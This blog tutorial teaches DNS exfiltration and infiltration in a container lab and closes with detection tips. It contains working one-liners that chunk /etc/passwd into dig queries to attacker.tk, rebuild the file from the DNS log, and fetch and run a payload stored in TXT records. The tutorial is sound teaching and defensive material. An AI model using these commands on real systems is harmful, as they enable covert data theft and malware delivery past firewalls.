Floating point

Introduction to DNS exfiltration and infiltration

Carlo Mandelli
03 Dec, 2021

We all know that an infected endpoint can gain access to sensitive data, but how does that data get out?

Malware usually tries to send the collected data directly over HTTP to the attacker’s control server. But have you ever wondered how it can do that from an endpoint behind a corporate firewall that denies all HTTP traffic?

Well, practically all environments allow DNS requests through their firewalls. Each application, even if it doesn’t have to contact external services, needs to resolve hostnames to IPs and vice versa.

Internal DNS servers are usually configured to forward the requests they cannot answer to external DNS servers, which in turn reach the servers that are authoritative for that particular domain. If you query an internal DNS for a record it owns (in our lab it is authoritative for the whole acme.corp domain), like this:

💉 app@server ~ $ dig +short db.acme.corp
172.21.0.153

the internal DNS will answer you directly:

🌍 root@dns  # tail -f /var/log/dnsmasq.log 
Nov 25 10:53:42 dnsmasq[1]: query[A] db.acme.corp from 172.21.0.3
Nov 25 10:53:42 dnsmasq[1]: config db.acme.corp is 172.21.0.153

but if you ask for a record it doesn’t know:

💉 app@server ~ $ dig +short www.google.com
142.250.180.68

it will forward the request through the DNS chain to get the answer:

🌍 root@dns  # tail -f /var/log/dnsmasq.log 
Nov 25 10:54:55 dnsmasq[1]: query[A] www.google.com from 172.21.0.3
Nov 25 10:54:55 dnsmasq[1]: forwarded www.google.com to 8.8.8.8
Nov 25 10:54:55 dnsmasq[1]: reply www.google.com is 142.250.180.68

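The flow of network traffic seen in this example can be summarized as follows: the client queries the internal DNS, which answers directly for the records it owns and forwards everything else to an external DNS, relaying the reply back to the client.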

So what happens if an attacker owns a domain (in our example “attacker.tk”), manages the authoritative DNS for that zone and simply enables logging of the queries it receives? The attacker can get data out of the infected endpoint by forging queries with the data embedded in them, and the DNS traffic carries it past the firewall blocks.

Nowadays you can buy a real domain and spin up a Linux server in the cloud for a few bucks, but for the demo I created a lab based on containers emulating three servers: the infected endpoint at Acme Corp (💉 server), the internal DNS at Acme Corp (🌍 dns) and the attacker DNS/controller (💀 dns). I also created two separate networks (internal and external) to simulate the firewall.

The attacker DNS server is already configured to log every query it receives (I’ve used dnsmasq for simplicity but you could use whatever you prefer, like BIND, Unbound, CoreDNS, etc.).

If you want to follow this article in “hands-on” mode the whole lab, code and examples can be downloaded from a git repository [1].

Ok, let’s say the malware on the Acme server discovered whateveryouwant as a plain-text password and wants to get it out. It inserts the password as part of a name in the attacker.tk domain and asks the DNS to resolve it:

💉 app@server ~ $ dig +short whateveryouwant.attacker.tk
172.21.1.155

Acme DNS will forward the query to the external DNS managed by the attacker:

🌍 root@dns  # tail -f /var/log/dnsmasq.log 
Nov 25 10:58:52 dnsmasq[1]: query[A] whateveryouwant.attacker.tk from 172.21.0.3
Nov 25 10:58:52 dnsmasq[1]: forwarded whateveryouwant.attacker.tk to 172.21.1.3
Nov 25 10:58:52 dnsmasq[1]: reply whateveryouwant.attacker.tk is 172.21.1.155

and, in the attacker DNS server, we can see we got our password:

💀 root@dns  # tail -f /var/log/dnsmasq.log
Nov 25 10:58:52 dnsmasq[1]: query[A] whateveryouwant.attacker.tk from 172.21.1.2
Nov 25 10:58:52 dnsmasq[1]: config whateveryouwant.attacker.tk is 172.21.1.155

This technique is called DNS exfiltration.

As you may have noticed, on the attacker DNS the query came from the IP 172.21.1.2, which belongs to the Acme DNS server, not to the infected endpoint (which is 172.21.0.3). That’s why it can get out: the firewall rules let the DNS server through, but not the clients.

To hide the data we are sending out, we can divide it into chunks, mix them with random data to add noise, and also encrypt them. As long as we know the algorithm used, we will always be able to decode it.

Let’s see an example where our data (the same whateveryouwant string) is split into blocks of four chars each (using “zero” as padding), where the real information is placed after 10 random characters and followed by another five. Now the same result we got before can be achieved by making 4 different queries:

kjhdcmjdhcwhatcjhja.attacker.tk

ounmndbbvcevercjhja.attacker.tk

gndndgbvctyouwcjsja.attacker.tk

sgnjnkgbvcant0cksja.attacker.tk
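The chunking scheme above can be sketched in a few lines of shell and awk. This is only an illustration under the layout described in the text (10 random characters, 4 data characters, 5 random characters); the function name `make_queries` is hypothetical, and the noise comes from awk's `rand()`, which is seeded from the clock and is not cryptographically strong.

```shell
# make_queries DATA DOMAIN: print one query name per 4-char chunk of DATA.
# Hypothetical helper, layout assumed: 10 noise chars + 4 data chars + 5 noise chars.
make_queries() {
  awk -v data="$1" -v domain="$2" '
    # Return n random lowercase letters.
    function noise(n,    s, i) {
      s = ""
      for (i = 0; i < n; i++)
        s = s substr("abcdefghijklmnopqrstuvwxyz", int(rand() * 26) + 1, 1)
      return s
    }
    BEGIN {
      srand()
      # Pad with "0" until the length is a multiple of 4.
      while (length(data) % 4 != 0) data = data "0"
      for (pos = 1; pos <= length(data); pos += 4)
        print noise(10) substr(data, pos, 4) noise(5) "." domain
    }'
}

# Print the names only; piping each one to dig would actually send them.
make_queries whateveryouwant attacker.tk
```

The random parts differ on every run, but characters 11 to 14 of each name always carry the data.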

This way it’s not immediately clear to a defender what we are getting out. But with multiple queries we could face a problem: since DNS mostly runs over UDP, there is no guarantee that the queries will arrive in the order they were sent:

kjhdcmjdhcwhatcjhja.attacker.tk

gndndgbvctyouwcjsja.attacker.tk

ounmndbbvcevercjhja.attacker.tk

sgnjnkgbvcant0cksja.attacker.tk

In this case, reading sequentially from the log file, we’ll reassemble the chunks in the wrong order and end up with something like whatyouweverant0, which is not what we sent.

To fix that we need to forge our queries with an index that helps us reassemble all the chunks in the correct order. In our case the simplest method is to put the index at the beginning of the name, in place of the first random character. So even if we receive them in the wrong order we’ll be able to sort them correctly:

1jhdcmjdhcwhatcjhja.attacker.tk

3ndndgbvctyouwcjsja.attacker.tk

2unmndbbvcevercjhja.attacker.tk

4gnjnkgbvcant0cksja.attacker.tk
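On the receiving side, the indexed names can be put back together with standard tools. The sketch below assumes the layout used in this example: a single-digit index in the first position (so at most nine chunks) and the data in characters 11 to 14. The function name `reassemble` is hypothetical.

```shell
# reassemble: read indexed query names on stdin (any order), print the data.
# Assumes a one-digit index at position 1 and the chunk at positions 11-14.
reassemble() {
  sort -n | cut -c11-14 | tr -d '\n'
  echo
}

# The four names from the example, in the order they happened to arrive.
printf '%s\n' \
  1jhdcmjdhcwhatcjhja.attacker.tk \
  3ndndgbvctyouwcjsja.attacker.tk \
  2unmndbbvcevercjhja.attacker.tk \
  4gnjnkgbvcant0cksja.attacker.tk | reassemble
# prints: whateveryouwant0
```

The trailing 0 is the padding added to fill the last block.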

A DNS name can contain only valid characters, up to a total of 255 octets, with a maximum of 63 for each label, i.e. each part between two dots [2]. So far we have only used plain strings in a single label, but we can create more complex queries like this:

<random><chunk1>.<random><index-in-hex>.<random><chunk2>.<random>.attacker.tk

In this way we can send out more data in a single query.

Infected endpoints may run software that collects as much data as it can about the server itself but also about its environment (this phase is called “enumeration”). This is useful to get access to other servers in the same network and maybe reach more important data (this is called “lateral movement”).
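When packing several labels into one name it is easy to overshoot the size limits from [2]. A small check along these lines can catch that before a query is sent; `check_name` is a hypothetical helper, and it assumes names are written without a trailing dot. The 253 figure is the text-form equivalent of the 255-octet wire limit.

```shell
# check_name NAME: succeed only if NAME respects the DNS size limits.
# Hypothetical helper; NAME is expected without a trailing dot.
check_name() {
  printf '%s\n' "$1" | awk -F. '
    {
      # 255 octets on the wire leave 253 characters in dotted text form.
      if (length($0) > 253) exit 1
      # Every label must be between 1 and 63 characters long.
      for (i = 1; i <= NF; i++)
        if (length($i) < 1 || length($i) > 63) exit 1
    }'
}

check_name kjhdcmjdhcwhatcjhja.attacker.tk && echo "name fits"
```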

So what if we need to get out a whole report file? Well, the procedure is very similar.

The infected endpoint compresses and encodes the data, breaks it down into chunks and sends each chunk out with specific queries.

On the other side, the DNS managed by the attacker has to follow the same procedure in reverse order. It extracts the queries from the DNS log file, reassembles the chunks into a single stream, then decodes and decompresses it. At the end you will have the original file.

Let’s say we want to send out a big /etc/passwd file to collect all the local users of that server.

To achieve that we decided to use commonly used Linux commands which are installed by default on most distros.

First we compress the file with the gzip command to reduce its size. Then we convert the compressed binary stream into something we can use in a query, and here base64, a very common binary-to-text (and vice versa) encoding, comes to our aid. Next we split the encoded string into 63-char chunks with the fold command, and finally we use awk to forge our queries with a simple marker “c” followed by a three-digit index.

Here is an example of how each query should look:

## query as <marker><index>.<payload>.attacker.tk
dig +short c100.H4sIAAAAAAAAA3WT226jMBCG73mKPEAkYw5p4wfYq9WqUrtSbw04hZWNXR/S5O3.attacker.tk

And, using pipes, we can send the whole file in a single line command:

gzip -c /etc/passwd | base64 -w0 | fold -w63 | awk 'BEGIN {n = 100} {print "dig +short c"n"."$1".attacker.tk"; n++}' | sh

At this point, on the attacker DNS server, we should see log entries like this one:

Nov 25 09:51:48 dnsmasq[1]: query[A] c108.HiqfuDSWc1ejzeNTPEOkzL+Hi28Ry02bFs8/by+JFsr4e1kUpRz2pj7jmfyunuo.attacker.tk from 172.21.1.2

So, to get the file back, we need to execute all the steps in the opposite order. First we find the lines we are interested in from the DNS log file (using grep with our simple “c???” marker), extract only the query strings with awk and use the sort command to put them in the correct order. Once they are ordered we get rid of everything but the payload part with cut, use base64 to decode from text to binary and decompress the resulting stream to get the original file.

Even that can be done with a single line command:

grep -E "query\[A\] c[0-9]{3}\." /var/log/dnsmasq.log | awk '{print $6}' | sort -u | cut -d "." -f2 | base64 -d | gunzip -d > mynewfile

head -3 mynewfile
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
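Before touching a real log, the two pipelines can be checked against each other locally, with no DNS server involved. The sketch below is a dry run under the same scheme (marker “c”, index starting at 100, 63-char payload); `encode_file` and `decode_names` are hypothetical names. It uses `base64 | tr -d '\n'` instead of `-w0` for portability, and `base64 -d` assumes GNU coreutils or a compatible tool.

```shell
# encode_file FILE: print one query name per 63-char base64 chunk of FILE.
encode_file() {
  gzip -c "$1" | base64 | tr -d '\n' | fold -w63 |
    awk 'BEGIN { n = 100 } { print "c" n "." $1 ".attacker.tk"; n++ }'
}

# decode_names: read query names on stdin (any order), write the original bytes.
# A three-digit index keeps plain sorting correct up to c999.
decode_names() {
  LC_ALL=C sort -u | cut -d. -f2 | tr -d '\n' | base64 -d | gunzip -c
}

# Round trip on a throwaway file, with the names reversed on purpose.
sample=$(mktemp)
printf 'root:x:0:0:root:/root:/bin/ash\n' > "$sample"
encode_file "$sample" | sort -r | decode_names
rm -f "$sample"
```

If the output matches the input file, the same `decode_names` stage can be fed with the names extracted from the log.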

Now we know that we can exploit DNS to get data out from our infected endpoint but what if we need to get something in?

Common attacks are carried out in multiple stages. The first-stage payload is usually a small script (sometimes simply written in Bash or PowerShell) that fetches the so-called “second-stage payload”. This is the piece of code which does the real job (a binary to encrypt all data, a cryptocurrency miner and so on).

So the question is can we download a binary through DNS queries? The answer is yes, if the attacker DNS has been prepared to answer in the correct way to particular queries. This technique is called DNS infiltration.

So far our queries were all of type A (the default in dig, if not specified), which means “what is the address of this hostname?”, and the reply is the IPv4 address (type AAAA is for IPv6). But DNS handles a lot of other query types. For instance CNAME for aliases, PTR for reverse lookups from IP to name, or NS for authoritative name servers.

In this particular case the one that helps us is the TXT record [3]. As the name says, it can store ASCII text in DNS records. And we already know we can “transform” any file into text, as we did before with the base64 command, and store it as TXT records.

Let’s say the attacker created a statically compiled malware, then compressed and encoded it. He split it into chunks and created a TXT record for every chunk (these are for dnsmasq; the correct syntax depends on the DNS software you are using):

txt-record=c100.attacker.tk,H4sIAAAAAAAAA+ydC3Bc1XnH7+phL7a8EiA7wpj4mpFhZaGX8UN+yN6VZbgiplL
txt-record=c101.attacker.tk,xA7WWWQlpbSnoNdIKC9gYTdYmWtabqEkno2ZoR6UvhT7QTFoqOiFIlrGEh5A1DI
<...>
txt-record=c222.attacker.tk,VXX8v1aw6N88085ifwN99/jHXxI6xXP7Rv3zF1/l7gFS/+Ss8E6GYAAA==
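Records like these do not have to be written by hand. As a rough sketch, the same gzip, base64 and fold steps used for exfiltration can emit one `txt-record=` line per chunk. The function name `make_txt_records`, the starting index 100 and the 63-char chunk size are assumptions made for illustration.

```shell
# make_txt_records FILE DOMAIN: print one dnsmasq txt-record line per chunk.
# Hypothetical helper; index starts at 100 and chunks are 63 chars (assumed).
make_txt_records() {
  gzip -c "$1" | base64 | tr -d '\n' | fold -w63 |
    awk -v domain="$2" '
      BEGIN { n = 100 }
      { print "txt-record=c" n "." domain "," $1; n++ }'
}

# Demo on a throwaway file instead of a real binary.
sample=$(mktemp)
printf 'hello from the second stage\n' > "$sample"
make_txt_records "$sample" attacker.tk
rm -f "$sample"
```

The output can be appended to the dnsmasq configuration; the number of lines tells the first-stage script which index range to request.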

At this point, on the infected endpoint, the attacker (or more precisely the first-stage script) simply executes TXT queries in the correct order (it knows the payload is made of 123 chunks indexed from 100 to 222). Every response contains one chunk, so by applying the inverse procedure we get the complete binary file directly onto our infected server:

💉 app@server ~ $ for n in $(seq 100 222);do echo "dig txt +short c$n.attacker.tk" ;done | sh | tr -d '"' | base64 -d | gzip -d > malware

You can run it (obviously it’s not real malware) and you’ll see a nice steam locomotive crossing your terminal:

💉 app@server ~ $ chmod +x malware && ./malware

Please remember that all the manual steps we did so far were just to show how it works. In real cases we can use tools made for this purpose, like dnsteal or DNSStager.

We’re almost at the end of this journey, but I would like to spend a few words on how to mitigate this issue.

The difficulty in identifying this kind of attack lies in the fact that it is not easy to be one hundred percent sure of what we are facing based on a single request. It may contain anomalous elements (like its size) but that alone usually doesn’t prove anything. Instead we have to analyze the whole traffic flow (and/or the log files) and inspect the payloads to identify anomalies or specific patterns that differ from the usual trends.

Let’s see some key points that we should consider in our traffic analysis.

One well-known anomaly is the packet size (or the query length if we are analyzing log files). Domain names tend to be short so they are easy to remember, so something longer than usual is a good clue to investigate.

Another inconsistency can be spotted in the frequency of requests. Most of the time a client asks a small set of queries for different domains (e.g. one for web pages, one for images, one for styles and so on), and even when the URL changes the domains stay the same for the whole session. A particularly intense “chat” between a client and a DNS generates a spike in request frequency, which could mean something strange is happening.

Finally, uncommon query types could also ring an alarm bell. Clients usually ask for a limited range of record types, mostly A or PTR, and only rarely TXT. A client asking for many TXT records is another sign of anomaly.
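As a starting point, long names can be pulled out of a dnsmasq query log with a short awk filter. This is a sketch only: `long_queries` is a hypothetical name, the field positions assume the log format shown earlier in this article, and the default threshold of 50 characters is an arbitrary value that should be tuned on real traffic.

```shell
# long_queries [MAX]: read a dnsmasq log on stdin and print
# "client length name" for every query name longer than MAX (default 50).
long_queries() {
  awk -v max="${1:-50}" '
    $5 ~ /^query\[/ && length($6) > max { print $8, length($6), $6 }'
}

# Two log lines taken from the examples above; only the second is reported.
printf '%s\n' \
  'Nov 25 10:53:42 dnsmasq[1]: query[A] db.acme.corp from 172.21.0.3' \
  'Nov 25 09:51:48 dnsmasq[1]: query[A] c108.HiqfuDSWc1ejzeNTPEOkzL+Hi28Ry02bFs8/by+JFsr4e1kUpRz2pj7jmfyunuo.attacker.tk from 172.21.1.2' |
  long_queries
```

On a live server the same function can be fed with `long_queries < /var/log/dnsmasq.log`.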
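Request frequency can be approximated from the same log by counting queries per client and per domain. The sketch below uses a hypothetical `queries_per_domain` function and makes a simplifying assumption: the last two labels of a name identify the domain, which does not hold for suffixes such as co.uk.

```shell
# queries_per_domain: read a dnsmasq log on stdin and print
# "count client domain", busiest pairs first.
queries_per_domain() {
  awk '
    $5 ~ /^query\[/ {
      n = split($6, label, ".")
      # Assumption: the last two labels name the domain (not true for co.uk and similar).
      domain = (n >= 2) ? label[n-1] "." label[n] : $6
      count[$8 " " domain]++
    }
    END { for (key in count) print count[key], key }' | sort -rn
}

# Illustrative log lines in the format shown earlier.
printf '%s\n' \
  'Nov 25 10:54:55 dnsmasq[1]: query[A] www.google.com from 172.21.0.3' \
  'Nov 25 10:58:52 dnsmasq[1]: query[A] c100.aaaa.attacker.tk from 172.21.0.3' \
  'Nov 25 10:58:52 dnsmasq[1]: query[A] c101.bbbb.attacker.tk from 172.21.0.3' \
  'Nov 25 10:58:53 dnsmasq[1]: query[A] c102.cccc.attacker.tk from 172.21.0.3' |
  queries_per_domain
```

A client with hundreds of distinct names under one unfamiliar domain stands out immediately in this view.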
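The mix of record types is just as easy to tally, since dnsmasq writes the type between brackets in every query line. The function name `query_types` is hypothetical and the sample lines are illustrative, written in the log format shown earlier.

```shell
# query_types: read a dnsmasq log on stdin and print "count type",
# most frequent type first.
query_types() {
  awk '
    $5 ~ /^query\[/ {
      type = $5
      # Strip the surrounding "query[" and "]" to keep only the record type.
      gsub(/^query\[|\]$/, "", type)
      count[type]++
    }
    END { for (type in count) print count[type], type }' | sort -rn
}

printf '%s\n' \
  'Nov 25 10:54:55 dnsmasq[1]: query[A] www.google.com from 172.21.0.3' \
  'Nov 25 10:58:52 dnsmasq[1]: query[A] db.acme.corp from 172.21.0.3' \
  'Nov 25 10:59:01 dnsmasq[1]: query[TXT] c100.attacker.tk from 172.21.0.3' |
  query_types
```

Comparing these counts against a baseline taken on a normal day makes an unusual share of TXT queries easier to spot.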

I hope you discovered something that was of interest to you. If you have any further questions don’t hesitate to contact me.

That’s really all for now. Thanks guys.

References:

[1] https://github.com/camandel/dns-security-demo

[2] https://datatracker.ietf.org/doc/html/rfc1035#section-2.3.4

[3] https://datatracker.ietf.org/doc/html/rfc1035#section-3.3.14
